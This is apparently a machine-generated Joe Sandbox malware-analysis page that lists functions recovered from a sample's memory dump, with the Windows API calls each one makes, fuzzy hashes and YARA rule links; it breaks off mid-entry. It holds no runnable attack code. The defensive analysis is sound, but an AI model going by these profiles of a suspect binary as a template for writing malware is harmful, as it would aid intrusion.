Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: e03332c9d5490c18f0fb97b8666689a78e04534f06ac604468ace1ebf07d0000
Instruction ID: 74060f7adf40803ac491a87e32c98fab5f7b717a5d4990b77c0b9ae33bc752b2
Opcode Fuzzy Hash: e03332c9d5490c18f0fb97b8666689a78e04534f06ac604468ace1ebf07d0000
Instruction Fuzzy Hash: C111007A100301AFCB21AF34C855E7A77B8FF49350B40802BFC06CB261EB759805C7A8

Function 00443D46 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00443D65

Part of subcall function 004345EC: __FF_MSGBANNER.LIBCMT ref: 00434603
Part of subcall function 004345EC: __NMSG_WRITE.LIBCMT ref: 0043460A
Part of subcall function 004345EC: RtlAllocateHeap.NTDLL(00B60000,00000000,00000001), ref: 0043462F

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: e4457491e1347f0b5ac4ec6c13d6b77c4984fda91bf7ab0281d21a584f9fc08e
Instruction ID: aa375b2acb11aefcb501fe3cb9cf39aede83c8fceb3670a795528312300c122e
Opcode Fuzzy Hash: e4457491e1347f0b5ac4ec6c13d6b77c4984fda91bf7ab0281d21a584f9fc08e
Instruction Fuzzy Hash: 3D11E771D05211ABEF353F71AC0579A3B986F44766F10453FFD099A291DF3C8A40865D

Function 0045713C Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 0045715C
_memset.LIBCMT ref: 0045717D
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 004571CF
CloseHandle.KERNEL32(00000000), ref: 004571D8

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 617ba9261c77319e53e5d905a5ebc17511036da8b8986fd82945ff85120a8fe3
Instruction ID: 649726e0e617d47d00b166eeda5cb58f11e70b3dc140373a0b202579a5f1b4c1
Opcode Fuzzy Hash: 617ba9261c77319e53e5d905a5ebc17511036da8b8986fd82945ff85120a8fe3
Instruction Fuzzy Hash: 60110A72D012287AD7205B65AC4DFEBBA7CEF45760F1041ABF904E72D0D2744E80CBA8

Function 004513D1 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 004513EE
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00451409
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0045141F
FreeLibrary.KERNEL32(?), ref: 00451474

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Type$FileFreeLibraryLoadModuleNameRegister
String ID:
API String ID: 3137044355-0
Opcode ID: 0dbf9771b16b4bb3ebaa2f17ca433182c2cbc1226d6a6345ed985fa7428b2e50
Instruction ID: 9e7c5c16a9d854b03ee3fb03a86f0e5e12348eedfc035178c136985ea33c6186
Opcode Fuzzy Hash: 0dbf9771b16b4bb3ebaa2f17ca433182c2cbc1226d6a6345ed985fa7428b2e50
Instruction Fuzzy Hash: EB21A571940209ABD7209F51DC88BDABBB8EF01705F00886FD91297122D778D949CF59

Function 0044BF5B Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0044B78E: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0044B7A5
Part of subcall function 0044B78E: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0044B7AF
Part of subcall function 0044B78E: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0044B7BE
Part of subcall function 0044B78E: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0044B7C5
Part of subcall function 0044B78E: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0044B7DB

GetLengthSid.ADVAPI32(?,00000000,0044BB10,?,?), ref: 0044BFAA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0044BFB6
RtlAllocateHeap.NTDLL(00000000), ref: 0044BFBD
CopySid.ADVAPI32(?,00000000,?), ref: 0044BFD6

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Heap$AllocateInformationProcessToken$CopyErrorLastLength
String ID:
API String ID: 259861997-0
Opcode ID: 39c8837da5b7a26c9036843ecd33af6fa388317e1c4ccd2246c4033353fd93a4
Instruction ID: a22b86787d78640b5a0d186e2e785cea114f4eba6e4975dfa7b191fc911f52d8
Opcode Fuzzy Hash: 39c8837da5b7a26c9036843ecd33af6fa388317e1c4ccd2246c4033353fd93a4
Instruction Fuzzy Hash: 85116D71600205AFEB149FA8CC85EBEB7A9EF55318B14442EE846D7210D735EE45CB94

Function 0044C265 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 0044C285
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0044C297
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0044C2AD
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0044C2C8

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 727db575fb83fb6fdcabc254be6661becadd785622dc0587550d41671ca8d566
Instruction ID: 2d1d643615b8465601f99bcf8218be845e92ddeff8a14b0d29fb65fe2f692130
Opcode Fuzzy Hash: 727db575fb83fb6fdcabc254be6661becadd785622dc0587550d41671ca8d566
Instruction Fuzzy Hash: A4110A7A941218FFEB11DB95C885E9DBBB4FB08710F204092E604B7294D6B1AE10DB94

Function 00457C45 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00457C6C
MessageBoxW.USER32(?,?,?,?), ref: 00457C9F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00457CB5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00457CBC

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: f9ab2bdbf08ffd444420b38229c1416e8d418f152f9ae073e2af8cbfb05260cd
Instruction ID: 74641e874345a80af0dd4f038cf6fac15275fbc4a4f42924afd9cc774c12c343
Opcode Fuzzy Hash: f9ab2bdbf08ffd444420b38229c1416e8d418f152f9ae073e2af8cbfb05260cd
Instruction Fuzzy Hash: DB112B72A05244BFC7029F6CEC09B9B7FAD9B44326F144237F925D3391D6749D088769

Function 0042C619 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0042C657
GetStockObject.GDI32(00000011), ref: 0042C66B
SendMessageW.USER32(00000000,00000030,00000000), ref: 0042C675

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 8e928f11c9f08620374a011cec9c6bf88bd8d378ae0f7999b0b5f4cb6ea0fda6
Instruction ID: 7c89a7e1c56742275196a2e0bb7b45481929fa127c891ef3298d6639a1bdaf83
Opcode Fuzzy Hash: 8e928f11c9f08620374a011cec9c6bf88bd8d378ae0f7999b0b5f4cb6ea0fda6
Instruction Fuzzy Hash: AF11A172601559BFDB114FA09C80EEE7B69EF19354F450226FA0452120C736DC60DBA9

Function 004549D1 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 004549EE
Sleep.KERNEL32(00000000), ref: 00454A13
QueryPerformanceCounter.KERNEL32(?), ref: 00454A1D
Sleep.KERNEL32(?), ref: 00454A50

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 7f9a65fe0f7a337b5b8ab22ffbd874734090bb69b6b1456c8854d2278bcd94e6
Instruction ID: 7206610eb65e18f456c4bd3c9d3497858bdc149628d7396f6f4093073f6d51d6
Opcode Fuzzy Hash: 7f9a65fe0f7a337b5b8ab22ffbd874734090bb69b6b1456c8854d2278bcd94e6
Instruction Fuzzy Hash: 7F117C31D40528DBCF00EFA5DA49AEEBB78FF98706F014066ED41BA241CB349994CB9D

Function 00445BA2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00445BC6

Part of subcall function 004462A5: __fltout2.LIBCMT ref: 004462CE

__cftog_l.LIBCMT ref: 00445BEC
__cftoe_l.LIBCMT ref: 00445C1E

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: 2fc87c1b6d903f6d3cbe4913ca7f99bc2a54eae92fe8589b41d10d911ee06a3b
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: 4E01403240064EBBDF125F84DC41CEE7F62FB19354B598416FE1859132D23AD9B2AB86

Function 004380E2 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043869D: __getptd_noexit.LIBCMT ref: 0043869E

__lock.LIBCMT ref: 0043811F
InterlockedDecrement.KERNEL32(?), ref: 0043813C
_free.LIBCMT ref: 0043814F
InterlockedIncrement.KERNEL32(00B72678), ref: 00438167

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: 1f6a56396c4dc655a3edd64d6398754c2e3db60645e3d0c755da0719fa332bbb
Instruction ID: 85ca9d11dfa2fc81619dcdad77913c0cbdeed9f8efe9770cd97f2eb5bbe518e9
Opcode Fuzzy Hash: 1f6a56396c4dc655a3edd64d6398754c2e3db60645e3d0c755da0719fa332bbb
Instruction Fuzzy Hash: 74015B319017259BCF61AF669806B9AF360BF08719F04512FF81467791CB2C6952CFDE

Function 0047DDEE Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0047DE07
ScreenToClient.USER32(?,?), ref: 0047DE1F
ScreenToClient.USER32(?,?), ref: 0047DE43
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 0047DE5E

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: d926d77e377be174d3050996e6d54ca684ce908a470b435b23f71feff48cde73
Instruction ID: 612ea8d757c125f470d51b7e29217c01c7e279ff60f5586476b3e123f487ce11
Opcode Fuzzy Hash: d926d77e377be174d3050996e6d54ca684ce908a470b435b23f71feff48cde73
Instruction Fuzzy Hash: 66111CB9D00209AFDB41DFA8C8849EEBBB9FB18210F108166E925E3210D735AA55CF54

Function 00438724 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00438768

Part of subcall function 00438984: __mtinitlocknum.LIBCMT ref: 00438996
Part of subcall function 00438984: RtlEnterCriticalSection.NTDLL(00430127), ref: 004389AF

InterlockedIncrement.KERNEL32(DC840F00), ref: 00438775
__lock.LIBCMT ref: 00438789
___addlocaleref.LIBCMT ref: 004387A7

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
String ID:
API String ID: 1687444384-0
Opcode ID: c6a47b86feb8006ab439955917caf92ebbeab8a4b0d39b70190f0e7b60fb4cc5
Instruction ID: 929839094e3b4a33323377b3da0fde4ca45488d133ba0d8dd9b36d839f6f8fbf
Opcode Fuzzy Hash: c6a47b86feb8006ab439955917caf92ebbeab8a4b0d39b70190f0e7b60fb4cc5
Instruction Fuzzy Hash: 30015BB5401B04DED760EF76C80575AF7F0AF58329F20990FE499872A1DB78A640CF09

Function 00459C73 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(?), ref: 00459C7F

Part of subcall function 0045AD14: _memset.LIBCMT ref: 0045AD49

_memmove.LIBCMT ref: 00459CA2
_memset.LIBCMT ref: 00459CAF
RtlLeaveCriticalSection.NTDLL(?), ref: 00459CBF

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: f4025db1b1976ffa3a3fddde62a95f1ccc2e248f7a986f15467053c398f66c4d
Instruction ID: 5948b9e38ae577f91f2ccedddf995ef61d66bb2919f0d93f39b460f2fa6878a9
Opcode Fuzzy Hash: f4025db1b1976ffa3a3fddde62a95f1ccc2e248f7a986f15467053c398f66c4d
Instruction Fuzzy Hash: 33F05476200000ABCF016F55EC85A59BB29EF49315F48C066FE085E217C735E815DBF9

Function 0047E83C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 0042B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0042B5EB
Part of subcall function 0042B58B: SelectObject.GDI32(?,00000000), ref: 0042B5FA
Part of subcall function 0042B58B: BeginPath.GDI32(?), ref: 0042B611
Part of subcall function 0042B58B: SelectObject.GDI32(?,00000000), ref: 0042B63B

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0047E860
LineTo.GDI32(00000000,?,?), ref: 0047E86D
EndPath.GDI32(00000000), ref: 0047E87D
StrokePath.GDI32(00000000), ref: 0047E88B

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 0bc062d130672f5edbe32c45db61d36339191b12adb9689acb63b5f0591ee9f9
Instruction ID: e302cfc58a43c093cbe93e859fb088f5a3e03f971a411ba683da2eb2dc953a11
Opcode Fuzzy Hash: 0bc062d130672f5edbe32c45db61d36339191b12adb9689acb63b5f0591ee9f9
Instruction Fuzzy Hash: 31F0BE32401269BADB126F55AC0EFCA3F9AAF1A314F008162FE05260E183794552DFAD

Function 0044D623 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0044D640
GetWindowThreadProcessId.USER32(?,00000000), ref: 0044D653
GetCurrentThreadId.KERNEL32 ref: 0044D65A
AttachThreadInput.USER32(00000000), ref: 0044D661

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: c3d1032bc67b52c744304efb837e4bdd47320f366c8141c7be189f5e132af478
Instruction ID: 8935ddfb7a40949954db717827a55f0679188d2774abc323894949541797136d
